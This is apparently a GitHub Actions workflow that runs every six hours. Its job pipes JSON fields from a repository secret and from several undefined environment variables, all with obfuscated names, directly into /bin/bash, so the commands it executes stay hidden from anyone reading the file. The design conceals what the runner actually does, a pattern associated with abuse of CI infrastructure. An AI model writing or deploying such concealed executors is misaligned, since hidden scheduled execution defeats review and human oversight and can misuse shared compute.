name: layercengjin
on:
  workflow_dispatch:
  schedule:
    - cron: '3 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: layercengjin
        env:
          i3: ${{ secrets.i3 }}
        run: |
          echo $i3 | jq -r .dra4507 | /bin/bash
          echo $qq051 | jq -r .y881 | /bin/bash
          echo $n28 | jq -r .nwfp27026 | /bin/bash
          echo $gjlfs359 | jq -r .mbp705 | /bin/bash
          echo $i21144 | jq -r .wbz9627 | /bin/bash
          echo $gmbmq67379 | jq -r .qpy22 | /bin/bash
          echo $txcn4 | jq -r .tjczy5 | /bin/bash
          echo $keuya7652 | jq -r .uylsg03 | /bin/bash
          echo $qf3 | jq -r .h938 | /bin/bash
          echo $p82100 | jq -r .xui5036 | /bin/bash
          echo $cdrxu59 | jq -r .vyhd78 | /bin/bash

